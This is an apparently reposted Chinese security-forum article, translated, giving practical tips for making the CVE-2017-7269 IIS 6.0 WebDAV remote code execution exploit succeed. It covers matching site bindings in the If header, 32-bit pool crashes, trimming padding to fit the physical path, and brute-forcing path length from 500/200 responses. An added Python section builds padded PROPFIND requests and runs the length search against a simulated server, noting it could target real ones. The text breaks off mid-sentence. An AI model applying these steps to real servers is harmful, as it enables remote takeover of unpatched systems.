myhack58 / 佚名 (Anonymous) / MYHACK58:62201785039
Apr 07, 2017 - 12:00 a.m.

CVE-2017-7269: a few tips and bug fixes - Vulnerability Alert - 黑吧安全网 (myhack58)

2017-04-07 00:00:00
佚名 (Anonymous)
www.myhack58.com

CVSS3: 9.8 High
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: NONE | Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

CVSS2: 10 High
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Access Vector: NETWORK | Access Complexity: LOW | Authentication: NONE | Confidentiality Impact: COMPLETE | Integrity Impact: COMPLETE | Availability Impact: COMPLETE

EPSS: 0.971 High (Percentile 99.7%)

Having read the analysis, here are a few tips on actually exploiting this.

1. Vulnerability scope

The original PoC states that it only applies to 2003 R2, but in fact the far more common 2003 SP2 can be reproduced directly as well, so the attack surface is very large; after all, most of the 2003 installs sold domestically are Enterprise Edition SP2.

Tested the English version of 2003 SP2 with the same success; other versions could not be tested for lack of an environment.

2. Why the exploit fails

Setting aside all the cases where the exploit simply cannot be used, even when the conditions are met there are four more things that can make it fail, listed here in reverse order of how much trouble they cause, with the worst last.

The first point is port and domain binding:

Local testing generally starts with the IIS default site, which has no bindings, so no problem shows up.

In fact, just as with the HOST field of the HTTP header, if the requested site has a binding then both URLs in the If header must match it exactly, domain name and port, otherwise all you get back is a 502.

![](/Article/UploadPic/2017-4/20174710552788.png)

For example, a test site bound only to port 8080 needs http://localhost:8080/; a test site bound to the domain zcgonvh.com on port 8888 needs http://zcgonvh.com:8888/; and so on.

The Exp itself is unaffected, of course:

![](/Article/UploadPic/2017-4/20174710552543.png)

Testing note: after changing the configuration, restart IIS, or, provided you stay below the failure threshold at which the application pool is disabled, just kill the w3wp process. The same applies to the tests below that need IIS configuration changes.

The second point is 64-bit. It is not common, but 64-bit 2003 does exist.

A 64-bit application pool is actually fine: SEH handles the exception and nothing crashes:

![](/Article/UploadPic/2017-4/20174710552905.png)

But in a 32-bit application pool it crashes:

![](/Article/UploadPic/2017-4/20174710552980.png)

Debugging shows the fault occurs inside the ROP chain; the client connection is simply dropped and no data is returned.

Solution: change the ROP chain.

64-bit 2003 is not that common after all, so this is left for later.

A 32-bit environment can be built as follows:

rem Switch the W3SVC application pools to 32-bit (WoW64) mode, then restart IIS so it takes effect
cscript.exe %SYSTEMDRIVE%\inetpub\adminscripts\adsutil.vbs SET W3SVC/AppPools/Enable32bitAppOnWin64 1
iisreset

Then disable all Web Service Extensions, add a new extension pointing to %systemroot%\syswow64\inetsrv\httpext.dll, and enable it.

![](/Article/UploadPic/2017-4/20174710552701.png)

The third point is the physical path. Yes, the physical path.

From the debugging in the analysis article "CVE-2017-7269 IIS 6.0 remote code execution vulnerability analysis and Exploit", you can see the buffer being overwritten:

![](/Article/UploadPic/2017-4/20174710552202.png)

Clearly, if the physical path that MapPath produces for the first URL in the If header is not the default one, that is, if the directory length including the trailing backslash is not 19 (c:\inetpub\wwwroot\ is exactly 19 characters), the error is inevitable.

The same applies to the second URL; an error caused by this returns a 500.

![](/Article/UploadPic/2017-4/20174710552330.png)

The solution is simple: change the length.

If the path is shorter than 19 you can simply append:

![](/Article/UploadPic/2017-4/20174710552563.png)

The real path, however, is usually longer than 19, so padding has to be removed. The padding in front of the ROP chain and stack pivot is actually UTF-8-encoded characters; each three bytes decode to one two-byte UTF-16 character, and as long as the Exp does not error, 0x58 of those characters serve no purpose. So the leading 0x108 bytes (0x58 three-byte sequences) can be deleted and replaced with 0x58 'a' or 'b' characters.

The final PoC looks roughly like this:

![](/Article/UploadPic/2017-4/20174710553564.png)

For genuinely stable remote exploitation, the physical path length also has to be brute-forced.

The red box holds 103 'a's; the physical path is c:\inetpub\ (11 characters), which adds up to 114. Removing the drive letter prefix c:\ leaves 111. So the padding in the Exp can be raised to 111 and then reduced one step at a time: a length mismatch returns 500, and success naturally returns 200.

![](/Article/UploadPic/2017-4/20174710553670.png)

In general there are almost no sites with a physical path longer than 114, so that range is sufficient. If the physical path is disclosed by some other means, 114 minus the physical path length (including the trailing backslash) is the required padding length.
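The binding rule from the first point and the padding arithmetic and length search from the third, as an added Python example written for this page rather than taken from the post or from its Exp. It models the procedure offline: the ROP chain and stack pivot are replaced by an inert placeholder string, the "(Not <locktoken:write1>)" layout of the If header follows the public PoC and is an assumption (the post does not print the header), and the responder is a constructed stand-in that returns only the three status codes the post describes (502 for a binding mismatch, 500 for a length mismatch, 200 otherwise). The figures 114, 111, 19, 0x108 and 0x58 are the post's own.

```python
import re

# Figures from the post: 103 'a' characters plus the 11-character physical path
# c:\inetpub\ total 114; c:\inetpub\wwwroot\ is the 19-character default the
# unmodified PoC assumes; a site rooted at c:\ leaves 111 for padding.
TOTAL_LENGTH = 114
DEFAULT_ROOT = "c:\\inetpub\\wwwroot\\"
MAX_PADDING = TOTAL_LENGTH - len("c:\\")   # 111, where the post starts the search
# Hypothetical placeholder: the post's ROP chain and stack pivot are not
# reproduced. It must not begin with the padding characters 'a'/'b'.
PAYLOAD_PLACEHOLDER = "%ROP-CHAIN-AND-STACK-PIVOT-NOT-REPRODUCED%"


def padding_for_path(physical_path: str) -> int:
    """Padding for a known physical path; the path must end with a backslash,
    as the post's 114 figure includes the trailing backslash."""
    if not physical_path.endswith("\\"):
        raise ValueError("physical path must include the trailing backslash")
    padding = TOTAL_LENGTH - len(physical_path)
    if padding < 0:
        raise ValueError("physical path longer than %d characters" % TOTAL_LENGTH)
    return padding


def utf16_units_from_utf8_bytes(byte_count: int) -> int:
    """Each 3-byte UTF-8 sequence in the original padding decodes to one UTF-16
    unit, which is why 0x108 bytes are replaced by 0x58 single characters."""
    return byte_count // 3


def build_propfind(host: str, port: int, padding: int, pad_char: str = "a") -> bytes:
    """Host header and both If-header URLs carry the same host:port, which must
    match the site binding exactly (point 1). Both URLs get the same padding
    because the post applies the same length rule to the second URL (point 3).
    The "(Not <locktoken:write1>)" separator follows the public PoC layout and
    is an assumption here; the post does not show the header verbatim."""
    url = f"http://{host}:{port}/{pad_char * padding}{PAYLOAD_PLACEHOLDER}"
    request = "\r\n".join([
        "PROPFIND / HTTP/1.1",
        f"Host: {host}:{port}",
        "Content-Length: 0",
        f"If: <{url}> (Not <locktoken:write1>) <{url}>",
        "", "",
    ])
    return request.encode("utf-8")


class SimulatedTarget:
    """Constructed stand-in for one IIS 6 site (not a real server). It models
    only the outcomes the post describes: 502 when host:port does not match the
    binding, 500 when the padding does not fit the physical path, 200 otherwise."""

    _URL = re.compile(r"<http://([^/>]+)/([^>]*)>")

    def __init__(self, bound_host: str, bound_port: int, physical_path: str):
        self.binding = f"{bound_host}:{bound_port}"
        self.expected_padding = padding_for_path(physical_path)

    def respond(self, request: bytes) -> int:
        headers = {}
        for line in request.decode("utf-8").split("\r\n")[1:]:
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        urls = self._URL.findall(headers.get("if", ""))
        if headers.get("host") != self.binding or len(urls) != 2:
            return 502
        if any(url_host != self.binding for url_host, _ in urls):
            return 502
        for _, path in urls:
            if len(re.match(r"[ab]*", path).group(0)) != self.expected_padding:
                return 500
        return 200


def find_padding(send, host: str, port: int, start: int = MAX_PADDING):
    """Walk the padding down from 111 until the target answers 200. `send` takes
    the raw request and returns the status code; 502 means the binding is wrong
    and no padding will ever work, so stop rather than keep searching."""
    for padding in range(start, -1, -1):
        status = send(build_propfind(host, port, padding))
        if status == 502:
            raise RuntimeError("Host/If-header host:port does not match the site binding")
        if status == 200:
            return padding
    return None


if __name__ == "__main__":
    # Constructed site bound to zcgonvh.com:8888 (the post's example binding)
    # and rooted at the default path, so the search should end at 114 - 19 = 95.
    site = SimulatedTarget("zcgonvh.com", 8888, DEFAULT_ROOT)
    print("padding found by search:", find_padding(site.respond, "zcgonvh.com", 8888))
```

Run as-is it reports 95, which is 114 minus the 19-character default root. Against a real target the `send` callable would be replaced by one that opens a TCP connection and returns the code from the status line; a 502 is a binding problem to fix in the Host and If headers before any length search, since the post's 500/200 distinction only appears once the binding matches.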

The last point, and the most infuriating one: the timeout problem.

Simply put, some time after the exp has run successfully (roughly ten to twenty minutes, regardless of whether the site is accessed in the meantime; time spent suspended in windbg does not count), running the exp against that site will never succeed again, and it returns 400.

With a debugger attached to w3wp you can see an access violation, although thanks to SEH it does not bring the site down.

![](/Article/UploadPic/2017-4/20174710553390.png)

At this point all the other sites in the same application pool hang as well, returning HTTP 500 with the error message "The parameter is incorrect":
